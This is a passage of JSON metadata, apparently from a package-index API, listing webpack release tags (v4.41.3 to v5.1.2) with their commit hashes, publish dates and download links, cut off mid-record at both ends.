78f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.